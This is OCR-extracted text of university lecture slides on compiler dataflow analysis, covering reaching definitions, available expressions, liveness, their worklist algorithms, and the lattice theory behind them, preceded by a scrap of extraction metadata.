20646, null], [20646, 20798, null]], "google_gemma-3-12b-it_is_public_document": [[0, 104, true], [104, 380, null], [380, 583, null], [583, 974, null], [974, 1697, null], [1697, 2058, null], [2058, 2204, null], [2204, 2533, null], [2533, 2675, null], [2675, 3060, null], [3060, 3432, null], [3432, 3696, null], [3696, 3861, null], [3861, 4055, null], [4055, 4609, null], [4609, 4998, null], [4998, 5014, null], [5014, 5319, null], [5319, 5839, null], [5839, 6127, null], [6127, 6661, null], [6661, 6962, null], [6962, 7249, null], [7249, 7532, null], [7532, 7897, null], [7897, 7920, null], [7920, 8283, null], [8283, 9182, null], [9182, 9827, null], [9827, 9850, null], [9850, 9863, null], [9863, 10086, null], [10086, 10189, null], [10189, 10570, null], [10570, 10998, null], [10998, 11420, null], [11420, 11605, null], [11605, 11974, null], [11974, 12174, null], [12174, 12312, null], [12312, 13112, null], [13112, 13422, null], [13422, 13669, null], [13669, 14132, null], [14132, 14363, null], [14363, 14393, null], [14393, 14641, null], [14641, 14923, null], [14923, 15244, null], [15244, 15530, null], [15530, 15816, null], [15816, 15972, null], [15972, 16262, null], [16262, 16552, null], [16552, 16754, null], [16754, 17041, null], [17041, 17286, null], [17286, 18601, null], [18601, 18883, null], [18883, 19328, null], [19328, 19459, null], [19459, 19483, null], [19483, 20008, null], [20008, 20331, null], [20331, 20646, null], [20646, 20798, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20798, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20798, null]], "pdf_page_numbers": [[0, 104, 1], [104, 380, 2], [380, 583, 3], [583, 974, 4], [974, 1697, 5], [1697, 2058, 6], [2058, 2204, 7], [2204, 2533, 8], [2533, 2675, 9], [2675, 3060, 10], [3060, 3432, 11], [3432, 3696, 12], [3696, 3861, 13], [3861, 4055, 14], [4055, 4609, 15], [4609, 4998, 16], [4998, 5014, 17], [5014, 5319, 18], [5319, 5839, 19], [5839, 6127, 20], [6127, 6661, 21], [6661, 6962, 22], [6962, 7249, 23], [7249, 7532, 24], [7532, 7897, 25], [7897, 7920, 26], [7920, 8283, 27], [8283, 9182, 28], [9182, 9827, 29], [9827, 9850, 30], [9850, 9863, 31], [9863, 10086, 32], [10086, 10189, 33], [10189, 10570, 34], [10570, 10998, 35], [10998, 11420, 36], [11420, 11605, 37], [11605, 11974, 38], [11974, 12174, 39], [12174, 12312, 40], [12312, 13112, 41], [13112, 13422, 42], [13422, 13669, 43], [13669, 14132, 44], [14132, 14363, 45], [14363, 14393, 46], [14393, 14641, 47], [14641, 14923, 48], [14923, 15244, 49], [15244, 15530, 50], [15530, 15816, 51], [15816, 15972, 52], [15972, 16262, 53], [16262, 16552, 54], [16552, 16754, 55], [16754, 17041, 56], [17041, 17286, 57], [17286, 18601, 58], [18601, 18883, 59], [18883, 19328, 60], [19328, 19459, 61], [19459, 19483, 62], [19483, 20008, 63], [20008, 20331, 64], [20331, 20646, 65], [20646, 20798, 66]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20798, 0.23142]]}
|
olmocr_science_pdfs
|
2024-11-25
|
2024-11-25
|
5d28f6f3d013f434bf2d2fdc0f90be9fa6afbd57
|
CS 526
Advanced Compiler Construction
http://misailo.cs.illinois.edu/courses/cs526
DATAFLOW ANALYSIS
The slides adapted from Saman Amarasinghe, Martin Rinard and Vikram Adve
Why Dataflow Analysis?
Answers key questions about the flow of values and other program properties over control-flow paths at compile-time.
Why Dataflow Analysis?
**Compiler fundamentals**
What defs. of x reach a given use of x (and vice-versa)?
What {<ptr,target>} pairs are possible at each statement?
**Scalar dataflow optimizations**
Are any uses reached by a particular definition of x?
Has an expression been computed on all incoming paths?
What is the innermost loop level at which a variable is defined?
**Correctness and safety:**
Is variable x defined on every path to a use of x?
Is a pointer to a local variable live on exit from a procedure?
**Parallel program optimization**
Where is dataflow analysis used?
Everywhere
Where is dataflow analysis used?
**Preliminary Analyses**
- Pointer Analysis
- Detecting uninitialized variables
- Type inference
- Strength Reduction for Induction Variables
**Static Computation Elimination**
- Dead Code Elimination (DCE)
- Constant Propagation
- Copy Propagation
**Redundancy Elimination**
- Local Common Subexpression Elimination (CSE)
- Global Common Subexpression Elimination (GCSE)
- Loop-invariant Code Motion (LICM)
- Partial Redundancy Elimination (PRE)
**Code Generation**
- Liveness analysis for register allocation
**Basic Term Review**
**Point**: A location in a basic block just before or after some statement.
**Path**: A path from points $p_1$ to $p_n$ is a sequence of points $p_1, p_2, \ldots p_n$ such that (intuitively) some execution can visit these points in order.
**Kill of a Definition**: A definition $d$ of variable $V$ is killed on a path if there is an unambiguous (re)definition of $V$ on that path.
**Kill of an Expression**: An expression $e$ is killed on a path if there is a possible definition of any of the variables of $e$ on that path.
Dataflow Analysis (Informally)
Symbolically simulate execution of program
- Forward (Reaching Definitions)
- Backward (Variable Liveness)
Stacked analyses and transformations that work together, e.g.
- Reaching Definitions $\rightarrow$ Constant Propagation
- Variable Liveness $\rightarrow$ Dead code elimination
Our plan:
- Examples first (analysis + theory)
- Theory follows
Analysis: Reaching Definitions
A definition \( d \) reaches point \( p \) if there is a path from the point after \( d \) to \( p \) such that \( d \) is not killed along that path.
Example Statements:
\[
\begin{align*}
a &= x+y \\
b &= a+1
\end{align*}
\]
- It is a definition of \( a \)
- It is a use of \( x \) and \( y \)
A definition reaches a use if the value written by the definition may be read by the use.
```plaintext
s = 0;
a = 4;
i = 0;
k == 0
b = 1;
```
```plaintext
i < n
```
```plaintext
s = s + a*b;
i = i + 1;
```
```plaintext
b = 2;
```
```plaintext
return s
```
Reaching Definitions (Declarative)
Dataflow variables (for each block B)
\[ \text{In}(B) \equiv \text{the set of defs that reach the point before first statement in } B \]
\[ \text{Out}(B) \equiv \text{the set of defs that reach the point after last statement in } B \]
\[ \text{Gen}(B) \equiv \text{the set of defs in B that are not killed in B.} \]
\[ \text{Kill}(B) \equiv \text{the set of all defs that are killed in B (i.e., on the path from entry to exit of B, if def } d \not\in B; \text{ or on the path from } d \text{ to exit of B, if def } d \in B).} \]
The difference:
\[ \text{In}(B), \text{Out}(B) \text{ are } \textbf{global} \text{ dataflow properties (of the function).} \]
\[ \text{Gen}(B), \text{Kill}(B) \text{ are } \textbf{local} \text{ properties of the basic block B alone.} \]
Computing Reaching Definitions
Compute with sets of definitions
- represent sets using bit vectors data structure
- each definition has a position in bit vector
At each basic block, compute
- definitions that reach the start of block
- definitions that reach the end of block
Perform computation by simulating execution of program until reach fixed point
```
s = 0;
a = 4;
i = 0;
k == 0
b = 1;
b = 2;
0000000
1110000
1110000
1111100
1111100
1111100
1111111
1111111
1111111
1110000
1111000
1110100
1111100
0101111
1111100
1111111
1 2 3 4 5 6 7
1 2 3 4 5 6 7
1 2 3 4 5 6 7
1 2 3 4 5 6 7
1 2 3 4 5 6 7
i < n
6: s = s + a*b;
7: i = i + 1;
return s
```
Formalizing the analysis: Dataflow Equations
IN and OUT combine the properties from the neighboring blocks in CFG
\[ \text{IN}[b] = \text{OUT}[b_1] \cup \ldots \cup \text{OUT}[b_n] \]
- where \( b_1, \ldots, b_n \) are predecessors of \( b \) in CFG
\[ \text{OUT}[b] = (\text{IN}[b] - \text{KILL}[b]) \cup \text{GEN}[b] \]
\[ \text{IN}[\text{entry}] = 0000000 \]
Result: system of equations
Solving Equations
Use fixed point (worklist) algorithm
Initialize with solution of $\text{OUT}[b] = 0000000$
- Repeatedly apply equations
1. $\text{IN}[b] = \text{OUT}[b_1] \cup ... \cup \text{OUT}[b_n]$
2. $\text{OUT}[b] = (\text{IN}[b] - \text{KILL}[b]) \cup \text{GEN}[b]$
- Until reach fixed point*
* Fixed point = equation application has no further effect
Use a worklist to track which equation applications may have a further effect
Reaching Definitions Algorithm
for all nodes $n$ in $N$
\[ \text{OUT}[n] = \text{emptyset}; \quad \text{OUT}[n] = \text{GEN}[n]; \]
$\text{IN}[\text{Entry}] = \text{emptyset};$
$\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}];$
$\text{Changed} = N - \{ \text{Entry} \}; \quad \text{// } N = \text{all nodes in graph}$
while (Changed != emptyset)
choose a node $n$ in Changed;
Changed = Changed - $\{ n \}; \quad \text{// in efficient impl. these are bitvector operations}$
$\text{IN}[n] = \text{emptyset};$
for all nodes $p$ in predecessors($n$)
$\text{IN}[n] = \text{IN}[n] \cup \text{OUT}[p];$
$\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n]);$
if (OUT[$n$] changed)
for all nodes $s$ in successors($n$)
Changed = Changed U $\{ s \};$
Reaching Definitions: Convergence
Out[B] is finite
Out[B] never decreases for any B
\[ \Rightarrow \text{must eventually stop changing} \]
At most n iterations if n blocks
\[ \Leftarrow \text{Definitions need propagate only over acyclic paths} \]
**Transform: Constant Propagation**
Paired with reaching definitions (uses its results)
Check: Is a use of a variable a constant?
- Check all reaching definitions
- If all assign variable to same constant
- Then use is in fact a constant
Can replace variable with constant
1. \( s = 0; \)
2. \( a = 4; \)
3. \( i = 0; \)
4. \( b = 1; \)
5. \( b = 2; \)
6. \( s = s + a \cdot b; \)
7. \( i = i + 1; \)
Return \( s \)
Is a Being Constant in \( s = s + a \times b \)?
Is `a` Being Constant in `s = s + a*b`?
Analysis: Available Expressions
An expression \(x+y\) is available at a point \(p\) if
1. Every path from the initial node to \(p\) must evaluate \(x+y\) before reaching \(p\),
2. There are no assignments to \(x\) or \(y\) after the expression evaluation but before \(p\).
Available Expression information can be used to do global (across basic blocks) CSE
- If expression is available at use, no need to reevaluate it
- Beyond SSA-form analyses
Example: Available Expression
\[
\begin{align*}
a &= b + c \\
d &= e + f \\
f &= a + c \\
g &= a + c \\
b &= a + d \\
h &= c + f \\
j &= a + b + c + d
\end{align*}
\]
Is the Expression Available?
YES!
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
Is the Expression Available?
YES!
Is the Expression Available? **NO!**
Is the Expression Available?
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
NO!
Transformation: Common Subexpression Elimination
Uses the results of available expressions
Check:
• If the expression is available and computed before,
Transform:
• At the first location, create a temporary variable
• Replace the latter occurrence(s) with the temporary variable name.
Use of Available Expression
YES!
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
Use of Available Expression
YES!
\[ a = b + c \]
\[ d = e + f \]
\[ f = a + c \]
\[ g = a + c \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = a + b + c + d \]
Use of Available Expression
\[
\begin{align*}
a &= b + c \\
d &= e + f \\
f' &= a + c \\
f &= f' \\
g &= f' \\
b &= a + d \\
h &= c + f \\
j &= a + b + c + d
\end{align*}
\]
Use of Available Expression
\[ a = b + c \]
\[ d = e + f \]
\[ f' = a + c \]
\[ f = f' \]
\[ g = f' \]
\[ b = a + d \]
\[ h = c + f \]
\[ j = f' + b + d \]
Formalizing Analysis
Each basic block has
- **IN** = set of expressions available at start of block
- **OUT** = set of expressions available at end of block
- **GEN** = set of expressions computed in block
- **KILL** = set of expressions killed in in block
- Compiler scans each basic block to derive GEN and KILL sets
- Comparison with reaching definitions:
- definition reaches a basic block if it comes from **ANY** predecessor in CFG
- expression is available at a basic block only if it is available from **ALL** predecessors in CFG
Dataflow Equations
- $\text{IN}[b] = \text{OUT}[b_1] \cap ... \cap \text{OUT}[b_n]$
- where $b_1, ..., b_n$ are predecessors of $b$ in CFG
- $\text{OUT}[b] = (\text{IN}[b] - \text{KILL}[b]) \cup \text{GEN}[b]$
- $\text{IN}[\text{entry}] = 0000$
- Result: system of equations
Solving Equations
- Use fixed point algorithm
- \( \text{IN[entry]} = 0000 \)
- Initialize \( \text{OUT[b]} = 1111 \)
- Repeatedly apply equations
- \( \text{IN[b]} = \text{OUT[b1]} \cap \ldots \cap \text{OUT[bn]} \)
- \( \text{OUT[b]} = (\text{IN[b]} - \text{KILL[b]}) \cup \text{GEN[b]} \)
- Use a worklist algorithm to reach fixed point
Available Expressions Algorithm
for all nodes n in N
OUT[n] = E; // OUT[n] = E - KILL[n];
IN[Entry] = emptyset;
OUT[Entry] = GEN[Entry];
Changed = N - { Entry }; // N = all nodes in graph
while (Changed != emptyset)
choose a node n in Changed;
Changed = Changed - { n };
IN[n] = E; // E is set of all expressions
for all nodes p in predecessors(n)
IN[n] = IN[n] \cap OUT[p];
OUT[n] = GEN[n] U (IN[n] - KILL[n]);
if (OUT[n] changed)
for all nodes s in successors(n)
Changed = Changed U { s };
Questions
Does algorithm always halt?
If expression is available in some execution, is it always marked as available in analysis?
If expression is not available in some execution, can it be marked as available in analysis?
**Analysis: Variable Liveness**
A variable \( v \) is live at point \( p \) if
- \( v \) is used along some path starting at \( p \), and
- no definition of \( v \) along the path before the use.
When is a variable \( v \) dead at point \( p \)?
- No use of \( v \) on any path from \( p \) to exit node, or
- If all paths from \( p \) redefine \( v \) before using \( v \).
What Use is Liveness Information?
Register allocation.
• If a variable is dead, can reassign its register
Dead code elimination.
• Eliminate assignments to variables not read later.
• But must not eliminate last assignment to variable (such as instance variable) visible outside CFG.
• Can eliminate other dead assignments.
• Handle by making all externally visible variables live on exit from CFG
Conceptual Idea of Analysis
- Simulate execution
- But start from exit and go backwards in CFG
- Compute liveness information from end to beginning of basic blocks
Liveness Example
• Assume a, b, c visible outside method
• So they are live on exit
• Assume x, y, z, t not visible outside method
• Represent Liveness Using Bit Vector
– order is abcxyzt
Transformation: Dead Code Elimination
- Assume $a,b,c$ visible outside method
- So they are live on exit
- Assume $x,y,z,t$ not visible outside method
- Represent Liveness Using Bit Vector
- order is abcxyz
- Remove dead definitions
Transformation: Dead Code Elimination
- Assume \(a, b, c\) visible outside method
- So they are live on exit
- Assume \(x, y, z, t\) not visible outside method
- Represent Liveness Using Bit Vector
- order is \(abcxyz\)
- Remove dead definitions
Formalizing Analysis
• Each basic block has
– IN - set of variables live at start of block
– OUT - set of variables live at end of block
– USE - set of variables with upwards exposed uses in block
– DEF - set of variables defined in block
• USE\[x = z; x = x+1;\] = \{ z \} (x not in USE)
• DEF\[x = z; x = x+1; y = 1;\] = \{x, y\}
• Compiler scans each basic block to derive USE and DEF sets
Liveness Algorithm
for all nodes n in N - { Exit }
IN[n] = emptyset;
OUT[Exit] = emptyset;
IN[Exit] = use[Exit];
Changed = N - { Exit };
while (Changed != emptyset)
choose a node n in Changed;
Changed = Changed - { n };
OUT[n] = emptyset;
for all nodes s in successors(n)
OUT[n] = OUT[n] U IN[s];
IN[n] = use[n] U (out[n] - def[n]);
if (IN[n] changed)
for all nodes p in predecessors(n)
Changed = Changed U { p };
Similar to Other Dataflow Algorithms
Backwards analysis, not forwards
Still have transfer functions
Still have confluence operators
Can generalize framework to work for both forwards and backwards analyses
## Comparison
### Reaching Definitions
For all nodes $n$ in $N$
- $\text{OUT}[n] = \text{emptyset}$;
- $\text{IN}[\text{Entry}] = \text{emptyset}$;
- $\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]$;
- $\text{Changed} = N - \{ \text{Entry} \};$
while $(\text{Changed} \neq \text{emptyset})$
- choose a node $n$ in $\text{Changed}$;
- $\text{Changed} = \text{Changed} - \{ n \};$
- $\text{IN}[n] = \text{emptyset}$;
- for all nodes $p$ in $\text{predecessors}(n)$
- $\text{IN}[n] = \text{IN}[n] \cup \text{OUT}[p]$;
- $\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n])$;
- if $(\text{OUT}[n] \text{ changed})$
- for all nodes $s$ in $\text{successors}(n)$
- $\text{Changed} = \text{Changed} \cup \{ s \};$
### Available Expressions
For all nodes $n$ in $N$
- $\text{OUT}[n] = E$;
- $\text{IN}[\text{Entry}] = \text{emptyset}$;
- $\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]$;
- $\text{Changed} = N - \{ \text{Entry} \};$
while $(\text{Changed} \neq \text{emptyset})$
- choose a node $n$ in $\text{Changed}$;
- $\text{Changed} = \text{Changed} - \{ n \};$
- $\text{IN}[n] = E$;
- for all nodes $p$ in $\text{predecessors}(n)$
- $\text{IN}[n] = \text{IN}[n] \cap \text{OUT}[p]$;
- $\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n])$;
- if $(\text{OUT}[n] \text{ changed})$
- for all nodes $s$ in $\text{successors}(n)$
- $\text{Changed} = \text{Changed} \cup \{ s \};$
### Liveness
For all nodes $n$ in $N - \{ \text{Exit} \}$
- $\text{IN}[n] = \text{emptyset}$;
- $\text{OUT}[\text{Exit}] = \text{emptyset}$;
- $\text{IN}[\text{Exit}] = \text{use}[\text{Exit}]$;
- $\text{Changed} = N - \{ \text{Exit} \};$
while $(\text{Changed} \neq \text{emptyset})$
- choose a node $n$ in $\text{Changed}$;
- $\text{Changed} = \text{Changed} - \{ n \};$
- $\text{OUT}[n] = \text{emptyset}$;
- for all nodes $s$ in $\text{successors}(n)$
- $\text{OUT}[n] = \text{OUT}[n] \cup \text{IN}[p]$;
- $\text{IN}[n] = \text{use}[n] \cup (\text{OUT}[n] - \text{def}[n])$;
- if $(\text{IN}[n] \text{ changed})$
- for all nodes $p$ in $\text{predecessors}(n)$
- $\text{Changed} = \text{Changed} \cup \{ p \};$
## Comparison
### Reaching Definitions
<table>
<thead>
<tr>
<th>Expression</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>( \text{OUT}[n] = \text{emptyset}; )</td>
<td>( \text{OUT} ) initialized to emptyset</td>
</tr>
<tr>
<td>( \text{IN}[\text{Entry}] = \text{emptyset}; )</td>
<td>( \text{IN} ) at ( \text{Entry} ) initialized to emptyset</td>
</tr>
<tr>
<td>( \text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]; )</td>
<td>( \text{OUT} ) at ( \text{Entry} ) updated with ( \text{GEN} )</td>
</tr>
<tr>
<td>( \text{Changed} = N - { \text{Entry} }; )</td>
<td>( \text{Changed} ) set to all nodes except ( \text{Entry} )</td>
</tr>
</tbody>
</table>
- **Algorithm:**
- While \( \text{Changed} \neq \text{emptyset} \):
- Choose a node \( n \) in \( \text{Changed} \);
- Update \( \text{Changed} \) to remove \( n \);
- Update \( \text{IN}[n] \) to \( \text{emptyset} \);
- For all predecessors \( p \) of \( n \):
- Update \( \text{IN}[n] \) to \( \text{IN}[n] \cup \text{OUT}[p] \);
- Compute \( \text{OUT}[n] \) as \( \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n]) \);
- If \( \text{OUT}[n] \) changed:
- For all successors \( s \) of \( n \):
- Update \( \text{Changed} \) to add \( s \);
### Available Expressions
<table>
<thead>
<tr>
<th>Expression</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>( \text{OUT}[n] = \text{E}; )</td>
<td>( \text{OUT} ) initialized to ( \text{E} ) (assuming ( \text{E} ) is used in context)</td>
</tr>
<tr>
<td>( \text{IN}[\text{Entry}] = \text{emptyset}; )</td>
<td>( \text{IN} ) at ( \text{Entry} ) initialized to emptyset</td>
</tr>
<tr>
<td>( \text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]; )</td>
<td>( \text{OUT} ) at ( \text{Entry} ) updated with ( \text{GEN} )</td>
</tr>
<tr>
<td>( \text{Changed} = N - { \text{Entry} }; )</td>
<td>( \text{Changed} ) set to all nodes except ( \text{Entry} )</td>
</tr>
</tbody>
</table>
- **Algorithm:**
- While \( \text{Changed} \neq \text{emptyset} \):
- Choose a node \( n \) in \( \text{Changed} \);
- Update \( \text{Changed} \) to remove \( n \);
- Update \( \text{IN}[n] \) to \( \text{emptyset} \);
- For all predecessors \( p \) of \( n \):
- Update \( \text{IN}[n] \) to \( \text{IN}[n] \cup \text{OUT}[p] \);
- Compute \( \text{OUT}[n] \) as \( \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n]) \);
- If \( \text{OUT}[n] \) changed:
- For all successors \( s \) of \( n \):
- Update \( \text{Changed} \) to add \( s \);
## Reaching Definitions
- for all nodes $n$ in $N$
- $\text{OUT}[n] = \text{emptyset}$;
- $\text{IN}[\text{Entry}] = \text{emptyset}$;
- $\text{OUT}[\text{Entry}] = \text{GEN}[\text{Entry}]$;
- $\text{Changed} = N - \{ \text{Entry} \}$;
```
\begin{align*}
\text{while (Changed != emptyset)} & \\
& \text{choose a node } n \text{ in Changed;} \\
& \text{Changed} = \text{Changed} - \{ n \};
\end{align*}
```
- $\text{IN}[n] = \text{emptyset}$;
- for all nodes $p$ in predecessors($n$)
- $\text{IN}[n] = \text{IN}[n] \cup \text{OUT}[p]$;
- $\text{OUT}[n] = \text{GEN}[n] \cup (\text{IN}[n] - \text{KILL}[n])$;
- if ($\text{OUT}[n]$ changed)
- for all nodes $s$ in successors($n$)
- $\text{Changed} = \text{Changed} \cup \{ s \}$;
## Liveness
- for all nodes $n$ in $N$
- $\text{IN}[n] = \text{emptyset}$;
- $\text{OUT}[\text{Exit}] = \text{emptyset}$;
- $\text{IN}[\text{Exit}] = \text{use}[\text{Exit}]$;
- $\text{Changed} = N - \{ \text{Exit} \}$;
```
\begin{align*}
\text{while (Changed != emptyset)} & \\
& \text{choose a node } n \text{ in Changed;} \\
& \text{Changed} = \text{Changed} - \{ n \};
\end{align*}
```
- $\text{OUT}[n] = \text{emptyset}$;
- for all nodes $s$ in successors($n$)
- $\text{OUT}[n] = \text{OUT}[n] \cup \text{IN}[p]$;
- $\text{IN}[n] = \text{use}[n] \cup (\text{out}[n] - \text{def}[n])$;
- if ($\text{IN}[n]$ changed)
- for all nodes $p$ in predecessors($n$)
- $\text{Changed} = \text{Changed} \cup \{ p \}$;
Basic Idea
Information about program represented using values from algebraic structure called **lattice**
Analysis produces lattice value for each program point
Two flavors of analysis
- Forward dataflow analysis [e.g., Reachability]
- Backward dataflow analysis [e.g. Live Variables]
Forward Dataflow Analysis
Analysis propagates values forward through control flow graph with flow of control
- Each node has a **transfer function** $f$
- Input – value at program point before node
- Output – new value at program point after node
- Values flow from program points after predecessor nodes to program points before successor nodes
- **At join points**, values are combined using a merge function
Backward Dataflow Analysis
Analysis propagates values backward through control flow graph against flow of control
- Each node has a transfer function $f$
- Input – value at program point after node
- Output – new value at program point before node
- Values flow from program points before successor nodes to program points after predecessor nodes
- At split points, values are combined using a merge function
Partial Orders
Set $P$
Partial order relation $\leq$ such that $\forall x, y, z \in P$
- $x \leq x$ (reflexive)
- $x \leq y$ and $y \leq x$ implies $x = y$ (asymmetric)
- $x \leq y$ and $y \leq z$ implies $x \leq z$ (transitive)
Can use partial order to define
- Upper and lower bounds
- Least upper bound
- Greatest lower bound
Upper Bounds
If $S \subseteq P$ then
- $x \in P$ is an upper bound of $S$ if $\forall y \in S. \ y \leq x$
- $x \in P$ is the least upper bound of $S$ if
- $x$ is an upper bound of $S$, and
- $x \leq y$ for all upper bounds $y$ of $S$
- $\lor$ - join, least upper bound, $lub$, supremum, $sup$
- $\lor S$ is the least upper bound of $S$
- $x \lor y$ is the least upper bound of $\{x, y\}$
Lower Bounds
If $S \subseteq P$ then
- $x \in P$ is a lower bound of $S$ if $\forall y \in S. x \leq y$
- $x \in P$ is the greatest lower bound of $S$ if
- $x$ is a lower bound of $S$, and
- $y \leq x$ for all lower bounds $y$ of $S$
- $\wedge$ - meet, greatest lower bound, glb, infimum, inf
- $\wedge S$ is the greatest lower bound of $S$
- $x \wedge y$ is the greatest lower bound of \{x,y\}
Covering
\[ x < y \text{ if } x \leq y \text{ and } x \neq y \]
\textbf{x is covered by y} (y covers x) if
- \( x < y \), and
- \( x \leq z < y \) implies \( x = z \)
Conceptually, y covers x if there are no elements between x and y
Example
\[ P = \{000, 001, 010, 011, 100, 101, 110, 111\} \]
(standard boolean lattice, also called hypercube)
\( x \leq y \) is equivalent to \((x \text{ bitwise-and } y) = x\)
Hasse Diagram
- If \( y \) covers \( x \)
- Line from \( y \) to \( x \)
- \( y \) above \( x \) in diagram
Lattices
Consider poset \((P, \leq)\) and the operators \(\wedge\) (meet) and \(\vee\) (join)
If for all \(x, y \in P\) there exist \(x \wedge y\) and \(x \vee y\), then \(P\) is a lattice.
If for all \(S \subseteq P\) there exist \(\wedge S\) and \(\vee S\), then \(P\) is a complete lattice.
All finite lattices are complete.
Example of a lattice that is not complete: Integers \(Z\)
- For any \(x, y \in Z\), \(x \vee y = \max(x, y), x \wedge y = \min(x, y)\)
- But \(\vee Z\) and \(\wedge Z\) do not exist
- \(Z \cup \{+\infty, -\infty\}\) is a complete lattice
Top and Bottom
Greatest element of P (if it exists) is top (\( \top \))
Least element of P (if it exists) is bottom (\( \bot \))
Connection Between ≤, ∧, and ∨
The following 3 properties are equivalent:
• $x \leq y$
• $x \lor y = y$
• $x \land y = x$
Let’s prove:
• $x \leq y$ implies $x \lor y = y$ and $x \land y = x$
• $x \lor y = y$ implies $x \leq y$
• $x \land y = x$ implies $x \leq y$
Then by transitivity, we can obtain
• $x \lor y = y$ implies $x \land y = x$
• $x \land y = x$ implies $x \lor y = y$
Connecting Lemma Proofs
Prove: $x \leq y$ implies $x \lor y = y$
- $x \leq y$ implies $y$ is an upper bound of $\{x,y\}$.
- Any upper bound $z$ of $\{x,y\}$ must satisfy $y \leq z$.
- So $y$ is least upper bound of $\{x,y\}$ and $x \lor y = y$
Prove: $x \leq y$ implies $x \land y = x$
- $x \leq y$ implies $x$ is a lower bound of $\{x,y\}$.
- Any lower bound $z$ of $\{x,y\}$ must satisfy $z \leq x$.
- So $x$ is greatest lower bound of $\{x,y\}$ and $x \land y = x$
Connecting Lemma Proofs
Prove: \( x \lor y = y \) implies \( x \leq y \)
- \( y \) is an upper bound of \( \{x, y\} \) implies \( x \leq y \)
Prove: \( x \land y = x \) implies \( x \leq y \)
- \( x \) is a lower bound of \( \{x, y\} \) implies \( x \leq y \)
We have defined $\lor$ and $\land$ in terms of $\leq$
We will now define $\leq$ in terms of $\lor$ and $\land$
- Start with $\lor$ and $\land$ as arbitrary algebraic operations that satisfy **associative, commutative, idempotence, and absorption** laws
- Will define $\leq$ using $\lor$ and $\land$
- Will show that $\leq$ is a partial order
Intuitive concept of $\lor$ and $\land$ as information combination operators (or, and)
Algebraic Properties of Lattices
Assume arbitrary operations \( \lor \) and \( \land \) such that
- \((x \lor y) \lor z = x \lor (y \lor z)\) (associativity of \( \lor \))
- \((x \land y) \land z = x \land (y \land z)\) (associativity of \( \land \))
- \(x \lor y = y \lor x\) (commutativity of \( \lor \))
- \(x \land y = y \land x\) (commutativity of \( \land \))
- \(x \lor x = x\) (idempotence of \( \lor \))
- \(x \land x = x\) (idempotence of \( \land \))
- \(x \lor (x \land y) = x\) (absorption of \( \lor \) over \( \land \))
- \(x \land (x \lor y) = x\) (absorption of \( \land \) over \( \lor \))
Connection Between $\land$ and $\lor$
$x \lor y = y$ if and only if $x \land y = x$
Proof of $x \lor y = y$ implies $x = x \land y$
$$x = x \land (x \lor y) \quad \text{(by absorption)}$$
$$= x \land y \quad \text{(by assumption)}$$
Proof of $x \land y = x$ implies $y = x \lor y$
$$y = y \lor (y \land x) \quad \text{(by absorption)}$$
$$= y \lor (x \land y) \quad \text{(by commutativity)}$$
$$= y \lor x \quad \text{(by assumption)}$$
$$= x \lor y \quad \text{(by commutativity)}$$
Properties of $\leq$
Define $x \leq y$ if $x \lor y = y$
Proof of transitive property. Must show that
$x \lor y = y$ and $y \lor z = z$ implies $x \lor z = z$
$x \lor z = x \lor (y \lor z)$ (by assumption)
$= (x \lor y) \lor z$ (by associativity)
$= y \lor z$ (by assumption)
$= z$ (by assumption)
Properties of ≤
Proof of asymmetry property. Must show that
\[ x \lor y = y \text{ and } y \lor x = x \implies x = y \]
\[ x = y \lor x \quad (\text{by assumption}) \]
\[ = x \lor y \quad (\text{by commutativity}) \]
\[ = y \quad (\text{by assumption}) \]
Proof of reflexivity property. Must show that
\[ x \lor x = x \]
\[ x \lor x = x \quad (\text{by idempotence}) \]
Properties of $\leq$
Induced operation $\leq$ agrees with original definitions of $\lor$ and $\land$, i.e.,
- $x \lor y = \text{sup} \{x, y\}$
- $x \land y = \text{inf} \{x, y\}$
Proof of $x \lor y = \sup \{x, y\}$
Consider any upper bound $u$ for $x$ and $y$.
Given $x \lor u = u$ and $y \lor u = u$, must show $x \lor y \leq u$, i.e., $(x \lor y) \lor u = u$
\[
\begin{align*}
u &= x \lor u \quad \text{(by assumption)} \\
&= x \lor (y \lor u) \quad \text{(by assumption)} \\
&= (x \lor y) \lor u \quad \text{(by associativity)}
\end{align*}
\]
Proof of $x \land y = \inf \{x, y\}$
- Consider any lower bound $L$ for $x$ and $y$.
- Given $x \land L = L$ and $y \land L = L$, must show $L \leq x \land y$, i.e., $(x \land y) \land L = L$
